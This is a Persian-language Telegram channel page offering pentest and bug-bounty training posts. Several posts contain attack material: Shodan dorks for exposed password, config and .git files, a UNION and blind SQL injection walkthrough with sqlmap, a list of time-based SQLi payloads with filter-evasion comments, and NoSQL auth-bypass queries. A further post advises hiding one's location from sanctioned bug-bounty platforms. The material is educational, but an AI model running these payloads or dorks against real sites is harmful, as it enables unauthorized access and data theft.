Security hint @sec_hint Channel on Telegram

Security hint

@sec_hint


🔥Security training

🎯 قراره روشن کننده مسیرتون باشیم.

یوتیوب: www.youtube.com/@sec_hint

اپارات: aparat.com/sec_hint

گیت‌هاب: https://github.com/sechint

ادمین:
@adm_sec_hint

Security Hint (Persian)

با کانال تلگرامی Security Hint آشنا شوید! این کانال با هدف آموزش امنیت در فضای دیجیتال به وجود آمده است. اگر به دنبال اطلاعات و مهارت‌های لازم برای حفظ امنیت خود در اینترنت هستید، این کانال بهترین منبعی برای شما خواهد بود. از طریق این کانال اقدام به ارتقای دانش خود در زمینه امنیت اطلاعاتی کنید و با روش‌های نوین محافظت از خود آشنا شوید. برای دسترسی به منابع بیشتر، می‌توانید کانال Security Hint را در پلتفرم‌های دیگر نیز دنبال کنید. همچنین، با پیوستن به گروه گیت‌هاب این کانال، به پروژه‌ها و منابع بیشتری دسترسی پیدا خواهید کرد. اگر سوالی دارید، با ادمین کانال در ارتباط باشید. برای کسب اطلاعات بیشتر، به یوتیوب و اپارات کانال Security Hint مراجعه کنید.

Security hint

09 Jan, 18:45


اگر جاوااسکریپت رو در حد قابل قبولی بلدید میتونید از این فایل استفاده کنید و موارد مورد نیاز امنیت در جاوااسکریپت رو یاد بگیرید...
اگر چیزی از جاوااسکریپت نمیدونید بهتره با این فایل شروع نکنید.

#javascript

📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube

Security hint

18 Dec, 20:15


📕معرفی دوتا کتاب عالی برای یادگیری Hacking API

فقط اگر سطح زبان خوبی ندارید و نمیخاید خیلی وارد جزییات بشید و سر راست برید سر اصل مطلب پیشنهادم خوندن کتاب hacking API هست...

من بیشتر باهاش ارتباط برقرار کردم تا کتاب API Security in Action 🤷🏼‍♀️

شما کدوم رو خوندی و پیشنهاد میدید؟!

#API #hacking

📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube

Security hint

15 Dec, 15:38


همه چی در یک خط 🤔

یک ریپازیتوری فوق‌العاده که مجموعه‌ای از One-Liners آماده رو ارائه می‌ده! با این دستورات کوتاه، می‌تونید subdomain‌ها رو جمع‌آوری کنید، آسیب‌پذیری‌ها رو شناسایی کنید، و کارهای دیگه‌ای که توی باگ‌بانتی نیاز دارید رو سریع انجام بدید. اگر دنبال ابزارهای سریع و کاربردی هستید، این دقیقاً همونه که لازم دارید.

🔗 لینک

#Github #BugBounty

📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube

Security hint

13 Dec, 12:54


🤑Shodan Secrets | Hack Hidden Files Easily

🛑Default Directory Listing
http.html:"index of /"


🛑Backup Files
http.html:"index of /" http.html:"backup"


🛑Compressed Achives
http.html:"index of /" http.html:"tar.gz"


🛑Database Files
http.html:"index of /" http.html:"database"
http.html:"index of /" http.html:".sql"
http.html:"index of /" http.html:".db"
http.html:"index of /" http.html:"db_backup"
http.html:"index of /" http.html:"mysql.dump"
http.html:"index of /" http.html:".mdb"


🛑Configuration Files
http.html:"index of /" http.html:"config.xml"


🛑Wordpress Configuration Files
http.html:"index of /" http.html:"wp-config.php.txt"
http.html:"index of /" http.html:"wp-config.txt"
http.html:"index of /" http.html:"wp-config.php.bak"
http.html:"index of /" http.html:"wp-config.php.old"
http.html:"index of /" http.html:"wp-config.php.backup"
http.html:"index of /" http.html:"wp-config.php.zip"
http.html:"index of /" http.html:"wp-config.php.tar.gz"


🛑Passwords
http.html:"index of /" http.html:"pwd"
http.html:"index of /" http.html:"pass.txt"
http.html:"index of /" http.html:"password"
http.html:"index of /" http.html:"password.txt"
http.html:"index of /" http.html:"passwords.txt"
http.html:"index of /" http.html:"passwords.zip"


🛑Windows Server Config Files
http.html:"index of /" http.html:"web.config"


🛑Exposed Logs
http.html:"index of /" http.html:".log"
http.html:"index of /" http.html:"access.log"
http.html:"index of /" http.html:"error.log"
http.html:"index of /" http.html:"php_error.log"
http.html:"index of /" http.html:"debug.log"


🛑Configuration and Version Control Files
http.html:"index of /" http.html:".env"
http.html:"index of /" http.html:".svn"


🛑Git Repositories
http.html:"index of /" http.html:".git"
http.html:"index of /" http.html:"gitconfig"


📃 source

#shodan #Dorks

📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube

Security hint

12 Dec, 05:38


🚄راهنمای خوبی هست اگر هنوز سر اینکه از چی بخونم، از کجا بخونم مشکل دارید....🤔🤔

#BugBounty #book

📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube

Security hint

10 Dec, 15:27


🔍 Bug Bounty Tips for Smart Hunters 🐞


#bugbounty #trip

🌐Sec_Hint

Security hint

06 Dec, 17:04


🎯 چرا ' در Sql Injection نتیجه نمی‌دهد؟

ممکن است دلایل زیر مانع از نمایش نتیجه شوند:

خطاها در سمت سرور نمایش داده نمی‌شوند (Error Handling فعال است).
ورودی فیلتر شده و از بروز خطای SQL جلوگیری می‌شود.
تزریق در پارامتر اشتباه انجام شده است.

1- تست Blind SQL Injection:

🔹 اگر خروجی مشخصی نمی‌بینید، ممکن است با Blind SQL Injection مواجه باشید. از این روش‌ها استفاده کنید:
الف. Boolean-Based Injection:
?id=1 AND 1=1 -- (خروجی باید بدون تغییر باشد)
?id=1 AND 1=2 -- (خروجی باید تغییر کند یا صفحه خطا دهد)

ب. Time-Based Injection:
?id=1 AND SLEEP(5) -- (صفحه باید با تأخیر بارگذاری شود)


2- شناسایی ستون‌ها با UNION
تعداد ستون‌ها را با ORDER BY شناسایی کنید:
?id=1 ORDER BY 1--
?id=1 ORDER BY 2--

وقتی به خطا رسیدید، تعداد ستون‌ها یک عدد کمتر از مقدار تست‌شده است.

بعد از شناسایی تعداد ستون‌ها، از UNION SELECT استفاده کنید:
?id=1 UNION SELECT 1,2,3,4--

3- پیدا کردن ستون‌های قابل مشاهده

🔹 برای پیدا کردن ستون‌هایی که خروجی آن‌ها در صفحه نمایش داده می‌شود:
?id=1 UNION SELECT 1,'test',3,4--

🔑 وقتی مقدار 'test' نمایش داده شد، ستون قابل مشاهده است.
4- استخراج اطلاعات حساس

نسخه پایگاه داده:
?id=1 UNION SELECT 1,@@version,3,4--

?id=1 UNION SELECT 1,version(),3,4--


نام جداول موجود:
?id=1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--


استفاده از ابزارهای خودکار

💻 ابزار Sqlmap به شما کمک می‌کند که به‌صورت خودکار تزریق SQL را شناسایی و اطلاعات را استخراج کنید:
sqlmap -u "http://example.com/page.php?id=1" --dbs



#پنتست #SQLi #امنیت_سایبری #باگ_بانتی

📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube

Security hint

04 Dec, 15:53


بعد یه مدت یه پست گذاشتم اونم طولانی والبته پر اهمیت کانال تو شکه ویا شاید شما ⁉️⁉️⁉️
😂😂

Security hint

25 Nov, 19:19


🔥 راهنمای سریع دستورات Bash 🌟

اگر با Bash کار می‌کنید، سایتDevhints یک مرجع فوق‌العاده است! 🎯 اینجا می‌توانید مهم‌ترین دستورات Bash، میانبرها، و نکات کلیدی را به ساده‌ترین شکل ممکن یاد بگیرید.

📌 ویژگی‌ها:
- نکات کاربردی برای اسکریپت‌نویسی.
- توضیحات مختصر و دقیق.
- مناسب برای مبتدی‌ها و حرفه‌ای‌ها.

💻 با Bash حرفه‌ای‌تر شوید و وقتتان را ذخیره کنید! 🚀

#Bash

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube

Security hint

21 Nov, 13:30


🚨سیستم احراز هویت یکپارچه یا (SSO) چیست ؟

🔥بخش_اول

🔐 در واقع  SSO  یک راهکار احراز هویتی امن است که به کاربران اجازه می دهد تنها با استفاده از یک مجموعه داده ای برای احراز هویت، هم بتوانند بدون اتلاف وقت و انرژی به سایت ها و اپلیکیشن های مختلف وارد شوند و همچنین از دردسر های فراموشی پسورد نیز پیشگیری شود.

💡و Single Sign On یا (SSO) یک راهکار احراز هویت است که به کاربران اجازه می‌دهد تنها با یک بار ورود به سیستم، به چندین سرویس، اپلیکیشن، یا وبسایت دسترسی پیدا کنند. در این روش، پس از وارد کردن یک نام کاربری و پسورد در ابتدا، کاربر نیازی به وارد کردن مجدد اطلاعات در هر مرحله و برای هر سرویس ندارد. SSO بر اساس ایجاد یک رابطه اعتماد بین ارائه‌دهنده هویت (مانند گوگل یا فیسبوک) و ارائه‌دهنده سرویس (مانند وبسایت‌ها یا اپلیکیشن‌ها) عمل می‌کند. این راهکار موجب صرفه‌جویی در وقت و کاهش فراموشی رمز عبور می‌شود.

در سیستم SSO، مکانیزم احراز هویت به گونه‌ای طراحی شده که از طریق گواهینامه‌ها و پروتکل‌های امنیتی، اطمینان حاصل می‌شود که هویت کاربر به طور ایمن به تمامی سرویس‌های مرتبط منتقل می‌شود. این سیستم امنیت را بهبود می‌بخشد، زیرا کاربران می‌توانند از پسوردهای قوی‌تر و پیچیده‌تر استفاده کنند، بدون اینکه نگران به‌خاطر سپردن چندین پسورد برای سرویس‌های مختلف باشند.

#SSO

📝Hreza

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube

Security hint

20 Nov, 13:30


🔥 یک منبع فوق‌العاده برای یادگیری فازینگ با FFUF!

تک تک سوییچ هارو معرفی کرده و نمونه دستورات هم گذاشته که بتونید استفاده کنید.

🔗 یادگیری شروع کن: Fuzzing with FFUF

#FFUF

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube

Security hint

19 Nov, 15:49


🚀 ابزاری کاربردی LazyDork
🌐 به راحتی با دادن URL یک سایت، این ابزار دورک‌های آسیب‌پذیری مرتبط رو تولید می‌کنه تا بتونید در جمع‌آوری اطلاعات امنیتی مؤثر باشید.

ایده‌آل برای شروع اسکن‌های دورکینگ! 🕵️‍♂️💻

https://iamunixtz.github.io/LazyDork/

#Dork

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube

Security hint

15 Nov, 16:15


دوست دارید ویدیو هفته اینده در مورد چی باشه؟

پیشنیاز ها یا اسیب پذیری یا ... ؟!🙂‍↔️

توی کپشن برام بنویسید😉

Security hint

13 Nov, 14:19


🐢نکات طلایی قبل شروع مسیر:

🔹 قدم به قدم و با صبر پیش بروید: مسیر یادگیری تست نفوذ طولانیه و پر از چالش‌هایی که ممکنه دلسردتون کنه، ولی هر شکست یه فرصت یادگیریه. مثل حل معما، با پشتکار به پاسخ خواهید رسید.

🔹 قدرت خودآموزی رو فراموش نکنید: تو این حرفه، دانش همیشه در حال تغییر و به‌روزرسانیه. از دوره‌های آنلاین، کتاب‌ها، و منابع موجود استفاده کنید و از کنجکاوی خودتون برای کشف تهدیدات و تکنولوژی‌های جدید بهره ببرید.

🔹 متعهد به یادگیری عمیق باشید: سعی کنید هر موضوع رو به‌خوبی درک کنید و همیشه دنبال منابع جدید باشید. تسلط عمیق به مباحث امنیتی و شبکه، شما رو به یه متخصص قوی تبدیل می‌کنه.

🔹 اشتراک‌گذاری دانش و ارتباط با جامعه سایبری: به بقیه کمک کنید و فعالانه توی کنفرانس‌ها و انجمن‌ها شرکت کنید. این کار نه‌تنها دانش شما رو تثبیت می‌کنه، بلکه به پیشرفت کلی حوزه امنیت کمک می‌کنه.

🔹 دلیل و انگیزه داشته باشید: برای خودتون هدف تعیین کنید و به این فکر کنید که چرا می‌خواید این مسیر رو طی کنید. انگیزه‌های شخصی یا حرفه‌ای شما می‌تونه سوخت حرکت شما به سمت موفقیت باشه.

خلاصه اینکه: این مسیر پر از چالش و هیجانه، ولی وقتی که پشتکار، خودآموزی، و تعهد به یادگیری داشته باشید، می‌تونید به موفقیت‌های بزرگی در دنیای امنیت سایبری برسید!

#تست_نفوذ #شروع #roadmap

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube

Security hint

12 Nov, 19:01


اگه هنوز عضو گروهمون نشدید از لینک زیر بیا داخل:
https://t.me/Sec_Hint_chat

Security hint

06 Nov, 18:03


و چون درخواست کرده بودید برای نوشن لینوکس اون رو اینجا میزارم ☺️
Notion linux

#Notion #Linux

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube

Security hint

06 Nov, 17:59


سلاااام!! حالتون چطوره؟
امروز قسمت چهارم لینوکس رو گذاشتم یوتیوب که میتونید برید و استفاده کنید و اگر براتون مفید بود برای دوستانتون هم ارسال کنید که بهره مند بشن 🥰
https://youtu.be/3jCGkwSRMNo?si=UrOeNoozMXRF7D9n

#YouTube #Linux

@Sec_Hint

Security hint

01 Nov, 07:48


راستی قسمت سوم لینوکس هم در یوتیوب قرار گرفت.😎

به نظرم دیگه لینوکس ادامه ندم(انرژی که نمیدید)؟!🤔

https://youtu.be/F1nquqY2kP8?si=RoC-4BI5P_czbfwq

#YouTube #Linux

@Sec_Hint

Security hint

29 Oct, 16:14


🔥 نکات کلیدی برای شروع یادگیری Web Pentest

🔺درک آسیب‌پذیری‌ها: وقت بذارید تا جزئیات هر آسیب‌پذیری، نحوه شکل‌گیری و خطرات و نحوه اکسپلویت اون رو کاملاً بشناسید.

🔺بررسی کدهای نمونه: با تجزیه‌وتحلیل کدهای آسیب‌پذیر، شناخت عمیق‌تری از نحوه بروز آسیب‌پذیری‌ها پیدا می‌کنید.

🔺بدون کپی‌کردن پیلودها: از پیلودها به‌درستی و با درک کامل استفاده کنید.صرفا حفظ نکنید یا وردلیست داشته باشید و تست کنید. وقتی کامل درک کنید پیلود های بهتری هم میتونید بسازید

🔺یادداشت‌برداری کنید: از مطالبی که میخونید و لابراتوار هایی ک حل میکنید حتما یادداشت برداری کنید اینطوری میتونید متدولوژی خودتون رو بسازید و اگر چیزی یادتون رفت سرگردون نشید

🔺جستجو: یکی از اصلی ترین کار ها ریسرچ و جستجو کردن درمورد مشکلی هست که بهش برمیخورید نه اینکه مستقیم سولوشن (راه حل) رو ببینید

🔺از منابع معتبر استفاده کنید: منابع مفیدی مثل PayloadsAllTheThings و HackTricks رو همیشه در دسترس داشته باشید و از گوگل هم کمک بگیرید.

#starter #advice
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube

Security hint

28 Oct, 13:55


🥇اولین نقاط بررسی در پنتست یک سایت

وقتی یک سایت رو برای پنتست باز می‌کنید، اولین نقاطی که باید چک بشه شامل نقاط ورودی و عملکردهای کلیدی هست. این نقاط می‌تونند زمینه آسیب‌پذیری‌های رایجی باشن که دسترسی یا کنترل غیرمجاز رو امکان‌پذیر می‌کنند:
✔️Register

✔️Login

✔️Upload Functionality

✔️Search Box

✔️Comment & Feedback Section

✔️Contact Us Form

✔️GET & POST Request

✔️Cookies and Import Functions

#Checklist #تست_نفوذ

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube

Security hint

27 Oct, 15:38


🚀منابع یادگیری Regex برای پنتستر و باگ‌بانتی‌

Regex یا Regular Expressions در پنتستینگ و باگ‌بانتی کاربرد بسیاری داره؛ از جمله برای پیدا کردن الگوهای مشخص در داده‌ها، استخراج اطلاعات حساس، و شناسایی الگوهای آسیب‌پذیری. اگر Regex رو درست یاد بگیرید، می‌تونید با دقت بیشتری اسکن و تحلیل کنید.

این سه منبع برتر می‌تونند توی یادگیری شما مفید باشند:

1.ا Learn Regex در GitHub - آموزش‌های منظم و ساده
2.ا RegexOne - تمرینات قدم‌به‌قدم
3.ا RegexLearn - منابع تعاملی و کاربردی

هرکدوم از این منابع برای تمام سطوح مناسبه و بهتون کمک می‌کنه سریع‌تر الگوها رو شناسایی و استخراج کنید. 📊

#Regex #Source

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube

Security hint

25 Oct, 08:58


🎞لینک رو اینجا میزارم که دسترسی براتون راحت تر باشه.

راستی تمرین هم بدم انجام بدید یکم به چالش کشیده بشید یا ن 😏؟

https://youtu.be/iHGEsuHMuyM?si=6VaAUoigytJk0Vhx

#YouTube #linux #لینوکس

🌐Sec_Hint

Security hint

24 Oct, 12:14


🎞 ویدیو امروزمون در مورد کامند های ابتدایی و کار با فایل ها در لینوکس هست. یکی از موارد مهم که باید بدونید تا خروجی ابزار های مختلف باگ بانتی و پنتست رو بتونید مدیریت کنید😉

فقط یکم طولانی شده چون خواستم تک تک دستورات رو بررسی کنم و این سه تا موضوعی ک امروز گفتم به هم نزدیک تر بودن 😇

حمایت میکنید بزارم یوتیوب؟!😍

YouTube

Security hint

16 Oct, 14:32


🚨 CSP Bypass - Content Security Policy (CSP) 🚨

🌐 سایت CSP Bypass مرجع عالی برای محققان امنیت، توسعه‌دهندگان و کارشناسان تست نفوذ است تا با روش‌های دور زدن CSP آشنا شوند. CSP یکی از راه‌های مهم برای جلوگیری از حملات XSS است، اما اگر به درستی پیکربندی نشود، قابل دور زدن است.

🔧 با یادگیری تکنیک‌های مختلف و بررسی سناریوهای عملی، می‌توانید ضعف‌های پیکربندی CSP را شناسایی کنید


#CSP #امنیت #XSS #Bypass
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube

Security hint

15 Oct, 14:08


🎯معرفی پلتفرم های CTF بر اساس سطح سختی 🎯

🟢 مبتدی:
🔗 picoCTF
🔗 TryHackMe
🔗 CTFlearn
🔗 Hacker101 CTF
🔗 LegitBS
🔗 OverTheWire
🔗 Crackmes.one
🔗 CyberTalents
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳

🟡 سطح متوسط:
🔗 TryHackMe
🔗 Flare-On
🔗 CTFtime
🔗 Pwn College
🔗 OWASP WebGoat
🔗 PentesterLab
🔗 CMD Challenge
🔗 Hacksplaining
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳

🔴 پیشرفته:
🔗 Hack The Box
🔗 root-me 🌟🌟
🔗 VulnHub 🌟🌟
🔗 Exploit Exercises
🔗 PortSwigger Web Security 🌟🌟
🔗 Challenges.re
🔗 CryptoHack
🔗 CryptoPals
🔗 Rubiya CTF
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳

🟣 حرفه‌ای:
🔗 UnderTheWire
🔗 AttackDefense
🔗 FBCTF GitHub Archive
🔗 Awesome CTF GitHub
🔗 Awesome CTF Resources GitHub
🔗 Guy in a Tuxedo GitHub
🔗 Pwn.tn
🔗 SmashTheStack
🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳🕳

با هر سطحی که باشی، یکی از این پلتفرم‌ها حتماً به کارت میاد! 🚀

#CTF #امنیت_سایبری #آموزش

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube

Security hint

06 Oct, 14:59


🚨 Time-Based SQL Injection Payloads 🚨

این لیست شامل Payload‌های مختلف برای اجرای حملات SQL Injection با استفاده از تأخیر زمانی است. این روش به شما کمک می‌کند تا آسیب‌پذیری‌های زمان‌محور را در دیتابیس‌های مختلف مثل MySQL، PostgreSQL و MSSQL شناسایی کنید.

🔹 چند نمونه از Payloadها:

timebased payloads for different dbms:
XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='
...

⚠️ توجه: تمامی payloadها را برای تست امنیتی هدفمند استفاده کنید و از آن‌ها در محیط‌های قانونی بهره ببرید.

#SQLi #Injection #TimeBased #Security

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube

Security hint

04 Oct, 12:37


سلام به همراهان عزیزم😍
برای ادامه مسیر خوشحال میشم باهم تعامل داشته باشیم چه در کپشن اینجا چه در کامنت های یوتیوب، برام بنویسید و بگید:
چقدر براتون این ویدیو ها مفید بوده🤩
از چه چیزی خوشتون اومده و دوست داشتید و از چه چیزی خوشتون نیومده 🤔

و مثل همیشه مرسی که هستید❤️

Security hint

03 Oct, 13:30


🎞اگر تا حالا با SQLmap کار نکردید یا نمیدونید از UNION attack چطوری میشه استفاده کرد پیشنهاد میکنم ویدیو این هفته چنل یویتوب رو حتما ببینید😍

https://youtu.be/J9iYUNX3TV4?si=hcI-N772KvH3MlSe

#Youtube #sqlmap #sql_injection

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube

Security hint

30 Sep, 14:25


🚀جدیدترين و سریعترين DNS Resolver 🚀

یه ابزار فوق‌العاده به نام SanicDNS توسط Hadrian معرفی شده که می‌تونه ۵ میلیون درخواست DNS در ثانیه رو پردازش کنه! 😲
سرعت این DNS Resolver خیلی بیشتر از ابزارهای قدیمی مثل MassDNS هست و به‌خاطر عملکرد فوق‌العاده سریعش در پردازش و پاسخ به درخواست‌ها، می‌تونه برای تست‌های امنیتی و عملکرد شبکه مفید باشه. ⚡️

🔗 جزئیات بیشتر و دریافت:
SanicDNS در GitHub

#DNS #SanicDNS #CyberSecurity #Pentesting #BugBounty
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube

Security hint

26 Sep, 15:42


🧐تا حالا خواستین IP تون لو نره؟
چیکار کردین براش⁉️
دوست داشتید توی کپشن بنویسید‼️

در این مورد هم یک ویدیو توی یوتیوب گذاشتم😏
#YouTube #Fake_IP

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube

Security hint

19 Sep, 14:12


🎞و ویدیو ی این هفته چنل یوتیوبمون؟!
چقدر با sql injection اشنایی دارید؟

https://youtu.be/xlq0anqJRWw?si=tZzBn6AQsJpfPJCg

#YouTube #Sql_Injection #sqli

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube

Security hint

18 Sep, 13:30


🔥 ریپازیتوری Vulhub: یک ابزار قدرتمند برای شناخت کد های اسیب پذیر 🔥

💡 اگر به دنبال یک پلتفرم برای شبیه‌سازی آسیب‌پذیری‌های واقعی هستید، Vulhub یک انتخاب فوق‌العاده است. با استفاده از Docker-Compose، شما می‌تونید بدون نیاز به دانش عمیق از Docker، محیط‌هایی با آسیب‌پذیری‌های متنوع مثل RCE و SQL Injection راه‌اندازی کنید.

⚙️ مزایا:
- شبیه‌سازی حملات در محیط امن
- یادگیری نحوه اکسپلویت آسیب‌پذیری‌ها
- ابزار ارزشمند برای آموزش و تست عملی

🔗 مشاهده ریپازیتوری Vulhub

⚔️ سطح خودت رو ارتقا بده!

#Pentesting #BugBounty #Vulhub #CyberSecurity #Docker

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube

Security hint

16 Sep, 13:30


⁉️تا حالا شده توی هکروان برای خوندن یک گزارش درمورد اسیب پذیری خاص کلی بگردید؟

توی این ریپو گزارشات (reports) هکروان رو براساس نوع اسیب پذیری دسته بندی کرده و اینطوری ساده تر دسترسی دارید.

nored0x.github.io/penetration%20testing/writeups-Bug-Bounty-hackrone/

#hackerOne #reports #writeup
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube

Security hint

14 Sep, 13:20


🚨 جلوگیری از بلاک شدن در پلتفرم‌های باگ بانتی با استفاده از DNS Leak Test

همونطور که می‌دونید، پلتفرم‌های باگ‌بانتی مثل HackerOne و Bugcrowd ایران رو تحریم کردند و اگه بفهمند شما ایرانی هستید، ممکنه حسابتون رو بلاک کنند و دسترسی به تمام بانتی‌ها از بین بره. یکی از راه‌های شناسایی مکان کاربر از طریق DNS هست.

🔍 راه حل: تست نشت DNS

حتی اگر از VPN استفاده کنید، ممکنه درخواست‌های DNS شما به طور مستقیم از سمت سرور VPN عبور نکنه و به سرورهای دیگه نشت کنه. این نشت می‌تونه موقعیت واقعی شما رو فاش کنه و باعث بلاک شدن حساب‌تون بشه.

🔑 چطوری بفهمیم VPN ما نشت DNS داره؟

۱. به VPN متصل بشید.
۲. به سایت dnsleaktest.com برید.
۳. روی "Extended Test" کلیک کنید.
۴. نتایج رو بررسی کنید؛ اگر سرورهای DNS با کشور VPN شما هماهنگ نبودن، یعنی نشت DNS دارید!

🛡 راهکار: اگر نشت DNS داشتید، تنظیمات VPN رو بررسی کنید یا VPN معتبرتری رو استفاده کنید تا موقعیت شما امن باقی بمونه.

با این روش، می‌تونید از شناسایی شدن و بلاک شدن حساب‌تون در پلتفرم‌های باگ‌بانتی جلوگیری کنید. 🚫🔒

#باگ_بانتی #امنیت_وب #DNSLeak #حریم_خصوصی #VPN #باگ_هانتینگ #هک #امنیت

🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube

Security hint

13 Sep, 16:39


2 تای دیگه 😍🥰🥳

Security hint

12 Sep, 16:20


📦تا حالا با Hack The Box چالش داشتید؟

https://youtu.be/M36ziYBhTuE?si=X88GECR5j0b_Np0K

#YouTube #HackTheBox

از این مدل ویدیو ها مفیده براتون ؟
🔔با ما همراه باشید
🌐Sec_Hint & Boost & Youtube

Security hint

11 Sep, 13:31


🔍 SQL vs NoSQL: 🔍
یکی از چالش‌های مهم در تست نفوذ، شناخت دقیق نوع دیتابیس و استفاده از نقاط ضعف اون برای رسیدن به هدفه. دو نوع دیتابیس که بیشتر باهاشون سر و کار داریم، SQL و NoSQL هستن. امروز یه مقایسه سریع می‌کنیم و یه سری کوئری پرکاربرد رو هم معرفی می‌کنیم که توی حملات خیلی به درد می‌خوره.

🎯یک SQL: ساختارمند و قابل پیش‌بینی
وSQL مخفف "Structured Query Language" هست و برای دیتابیس‌های رابطه‌ای (Relational Databases) مثل MySQL، PostgreSQL، و SQL Server استفاده می‌شه. این نوع دیتابیس‌ها با جداول و روابط بین اون‌ها کار می‌کنن.

مثال کوئری‌های پرکاربرد در SQL:
- استخراج داده:

    SELECT * FROM users WHERE username = 'admin';

- تزریق (SQL Injection):

    SELECT * FROM users WHERE username = 'admin' --' AND password = 'password';

اینجاست که SQLi به درد می‌خوره؛ وقتی می‌خوای از نقاط ضعف توی اعتبارسنجی ورودی‌ها استفاده کنی.

🎯دو NoSQL: انعطاف‌پذیر و مقیاس‌پذیر
وNoSQL یعنی "Not Only SQL" و برای دیتابیس‌هایی استفاده می‌شه که ساختار غیررابطه‌ای دارن، مثل MongoDB، Cassandra، و CouchDB. این دیتابیس‌ها معمولاً داده‌ها رو به شکل سند (Document) یا جفت کلید-مقدار (Key-Value) ذخیره می‌کنن.

مثال کوئری‌های پرکاربرد در NoSQL:
- استخراج داده در MongoDB:

    db.users.find({ "username": "admin" });

- تزریق (NoSQL Injection):

    db.users.find({ "username": { $ne: null }, "password": { $ne: null } });

اینجا هم NoSQLi وقتی وارد می‌شه که داده‌ها به‌درستی اعتبارسنجی نمی‌شن و می‌تونیم با کوئری‌های مخرب، دیتابیس رو فریب بدیم.

⚔️ مقایسه کلی:
- ساختار داده: SQL داده‌ها رو به صورت جداول ساختاریافته ذخیره می‌کنه، در حالی که NoSQL از ساختارهای منعطف‌تری مثل JSON و Key-Value استفاده می‌کنه.
- مقیاس‌پذیری: SQL معمولاً به صورت عمودی (افزایش قدرت سرور) مقیاس‌پذیره، ولی NoSQL به صورت افقی (اضافه کردن سرورهای بیشتر) مقیاس‌پذیره.
- انعطاف‌پذیری: NoSQL توی کار با داده‌های بزرگ و غیرساختاریافته بهتر عمل می‌کنه.

💡 نکته مهم برای تست نفوذ:
